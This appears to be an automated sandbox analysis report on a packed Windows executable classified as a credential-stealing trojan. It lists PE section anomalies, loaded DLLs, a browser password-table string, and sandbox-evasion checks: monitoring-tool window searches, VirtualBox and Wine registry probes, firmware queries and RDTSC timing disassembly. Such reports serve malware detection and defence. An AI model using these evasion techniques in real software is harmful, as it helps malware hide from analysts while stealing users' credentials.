Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2AF70	0_2_00D2AF70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEEF77	0_2_00DEEF77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D32F79	0_2_00D32F79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD4F09	0_2_00CD4F09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3AF1B	0_2_00D3AF1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C64F08	0_2_00C64F08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D46F1B	0_2_00D46F1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB2F31	0_2_00DB2F31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5EF3A	0_2_00D5EF3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6EF23	0_2_00D6EF23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6EF30	0_2_00C6EF30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0EF26	0_2_00D0EF26
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCEF36	0_2_00CCEF36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB6F27	0_2_00DB6F27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D590DC	0_2_00D590DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC30C2	0_2_00CC30C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5B0C2	0_2_00D5B0C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC90FA	0_2_00DC90FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1F0D3	0_2_00E1F0D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDF0FF	0_2_00CDF0FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6F0E0	0_2_00D6F0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7B0EA	0_2_00D7B0EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7D085	0_2_00C7D085
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC7081	0_2_00DC7081
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D690B5	0_2_00D690B5

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00C64A30 appears 76 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00C58000 appears 55 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.997627865484429
Source: file.exe	Static PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00C80A6C CoCreateInstance,

0_2_00C80A6C

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2085220224.0000000005F27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085449890.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 39%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1895424 > 1048576

Source: file.exe

Static PE information: Raw size of xyjapqsh is bigger than: 0x100000 < 0x1a6c00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1de5a6 should be: 0x1de476

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xyjapqsh
Source: file.exe	Static PE information: section name: fjnsenoe
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA92DC push 6E698301h; mov dword ptr [esp], esi	0_2_00CA9E4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA80CB push 4501FEACh; mov dword ptr [esp], edx	0_2_00CA9184
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA80CB push 6E698301h; mov dword ptr [esp], esi	0_2_00CA9E4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA80CB push ecx; mov dword ptr [esp], eax	0_2_00CA9EEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push ebp; mov dword ptr [esp], ecx	0_2_00DB45F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push eax; mov dword ptr [esp], ecx	0_2_00DB463A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push 321E79D0h; mov dword ptr [esp], edi	0_2_00DB470E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push 43461CBBh; mov dword ptr [esp], eax	0_2_00DB477C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push 380B79A4h; mov dword ptr [esp], ebx	0_2_00DB4799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push ebx; mov dword ptr [esp], edi	0_2_00DB47C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push eax; mov dword ptr [esp], 00000000h	0_2_00DB47E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push ebx; mov dword ptr [esp], eax	0_2_00DB47FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB40D4 push 10D2F6F3h; mov dword ptr [esp], eax	0_2_00DB4821
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push 6A1A3047h; mov dword ptr [esp], edx	0_2_00CE4479
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push 49415445h; mov dword ptr [esp], eax	0_2_00CE44CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push 32671A53h; mov dword ptr [esp], edi	0_2_00CE4511
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push edi; mov dword ptr [esp], edx	0_2_00CE4539
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push 423F8820h; mov dword ptr [esp], edx	0_2_00CE456A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push 1F83E159h; mov dword ptr [esp], edx	0_2_00CE4575
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push ebp; mov dword ptr [esp], ebx	0_2_00CE4623
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE40D6 push ecx; mov dword ptr [esp], edi	0_2_00CE4666
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E340D7 push ecx; mov dword ptr [esp], edx	0_2_00E340E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E340D7 push ebp; mov dword ptr [esp], ecx	0_2_00E34170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2E0A5 push 2FFAD9BCh; mov dword ptr [esp], ecx	0_2_00E2E0ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push edx; mov dword ptr [esp], 5F04894Dh	0_2_00D96607
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push esi; mov dword ptr [esp], ebx	0_2_00D96615
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push 46F1CDCBh; mov dword ptr [esp], edx	0_2_00D966A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push ebp; mov dword ptr [esp], esi	0_2_00D966DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push 786C76A7h; mov dword ptr [esp], ebp	0_2_00D966FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push 7552DA3Ch; mov dword ptr [esp], edx	0_2_00D96744
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9608A push edi; mov dword ptr [esp], ebx	0_2_00D96792

Source: file.exe	Static PE information: section name: entropy: 7.97823310420282
Source: file.exe	Static PE information: section name: xyjapqsh entropy: 7.953197683807969

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA90B1 second address: CA90D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA90D2 second address: CA90D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E281F3 second address: E281F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E281F9 second address: E28201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2D3C1 second address: E2D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F450CC4A606h 0x0000000c popad 0x0000000d jmp 00007F450CC4A60Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30954 second address: E30963 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A20 second address: E30A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A24 second address: E30A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A2A second address: E30A51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jo 00007F450CC4A60Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A51 second address: E30A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F450CC4AB1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A5D second address: E30ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F450CC4A618h 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F450CC4A608h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 jg 00007F450CC4A60Bh 0x0000002f lea ebx, dword ptr [ebp+1245B889h] 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F450CC4A616h 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30ACD second address: E30AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30B70 second address: E30B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30B95 second address: E30BAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4AB1Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30BAB second address: E30C6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b je 00007F450CC4A618h 0x00000011 pop eax 0x00000012 mov esi, dword ptr [ebp+122D29A5h] 0x00000018 mov edi, dword ptr [ebp+122D28A9h] 0x0000001e push 00000003h 0x00000020 mov ecx, dword ptr [ebp+122D2A75h] 0x00000026 mov dword ptr [ebp+122D1C03h], edi 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2E22h], edi 0x00000034 push 00000003h 0x00000036 clc 0x00000037 push BF73C288h 0x0000003c jmp 00007F450CC4A610h 0x00000041 add dword ptr [esp], 008C3D78h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007F450CC4A608h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 lea ebx, dword ptr [ebp+1245B892h] 0x00000068 mov edx, 02DDB43Ah 0x0000006d xchg eax, ebx 0x0000006e push edi 0x0000006f jl 00007F450CC4A618h 0x00000075 jmp 00007F450CC4A612h 0x0000007a pop edi 0x0000007b push eax 0x0000007c jng 00007F450CC4A614h 0x00000082 pushad 0x00000083 jg 00007F450CC4A606h 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D05 second address: E30D2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, D5E0h 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D2AF9h] 0x0000001a call 00007F450CC4AB19h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D2D second address: E30D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D36 second address: E30D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F450CC4AB16h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F450CC4AB24h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jc 00007F450CC4AB24h 0x0000001d jmp 00007F450CC4AB1Eh 0x00000022 pop edi 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D78 second address: E30D86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F450CC4A606h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4EC84 second address: E4EC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F450CC4AB16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4EC8F second address: E4EC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4EC94 second address: E4EC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F243 second address: E4F273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F450CC4A617h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 jng 00007F450CC4A612h 0x00000016 jo 00007F450CC4A606h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F273 second address: E4F292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F450CC4AB1Bh 0x0000000b jmp 00007F450CC4AB1Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F411 second address: E4F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F56D second address: E4F573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F573 second address: E4F5B1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F450CC4A606h 0x00000016 jmp 00007F450CC4A60Dh 0x0000001b jmp 00007F450CC4A615h 0x00000020 popad 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F727 second address: E4F72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F8AF second address: E4F8C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F450CC4A608h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4F8C2 second address: E4F8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F450CC4AB16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1AA3F second address: E1AA48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1AA48 second address: E1AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1AA4D second address: E1AA75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A60Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50578 second address: E5059E instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4AB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F450CC4AB24h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5059E second address: E505A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E505A2 second address: E505E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F450CC4AB1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ja 00007F450CC4AB48h 0x00000013 jmp 00007F450CC4AB1Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F450CC4AB26h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E505E0 second address: E505EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50C9F second address: E50CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5AE1D second address: E5AE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F450CC4A606h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5B115 second address: E5B11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5B11A second address: E5B152 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F450CC4A623h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c jp 00007F450CC4A606h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
